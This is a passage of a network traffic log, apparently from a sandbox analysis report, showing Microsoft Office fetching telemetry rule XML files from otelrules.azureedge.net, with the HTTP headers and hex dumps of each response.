                                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                                      x-ms-request-id: f7184125-501e-0064-68d4-451f54000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125945Z-1746fd949bddtfvqhC1EWRxbpg000000015g000000006y9h
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:45 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      128192.168.2.44989513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:45 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:45 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1397
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                                      x-ms-request-id: 8863b02e-001e-008d-5ccb-45d91e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125945Z-1746fd949bdtlp5chC1EWRq1v4000000012000000000ce5a
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:46 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      129192.168.2.44989613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:45 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:46 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1360
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                      x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125946Z-1746fd949bddtfvqhC1EWRxbpg0000000150000000007vvw
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:46 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      130192.168.2.44989213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:46 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:46 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1360
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                                      x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125946Z-1746fd949bdw2rg8hC1EWR11u400000001d000000000aeqy
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:46 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      131192.168.2.44989813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:47 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:47 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1390
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                                      x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125947Z-1746fd949bddtfvqhC1EWRxbpg000000012000000000b0gv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:47 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      132192.168.2.44990013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:48 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:48 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1364
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                                      x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125948Z-1746fd949bdtlp5chC1EWRq1v4000000012000000000ce89
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:48 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      133192.168.2.44990113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:48 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:48 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1391
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                      x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125948Z-1746fd949bdtlp5chC1EWRq1v4000000013000000000akp6
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:48 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      134192.168.2.44989913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:48 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:49 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1401
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                                      x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125949Z-1746fd949bdkw94lhC1EWRxuz400000001cg000000007vkr
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:49 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      135192.168.2.44989713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:49 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:49 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1427
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                                      x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125949Z-1746fd949bdkw94lhC1EWRxuz400000001e0000000004vw1
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:49 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      136192.168.2.44990313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:50 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:50 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1403
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                                                                      x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125950Z-1746fd949bdfg4slhC1EWR34t00000000150000000004qn7
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:50 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      137192.168.2.44990413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:50 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:50 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1366
                                                                                                                                                      Connection: close
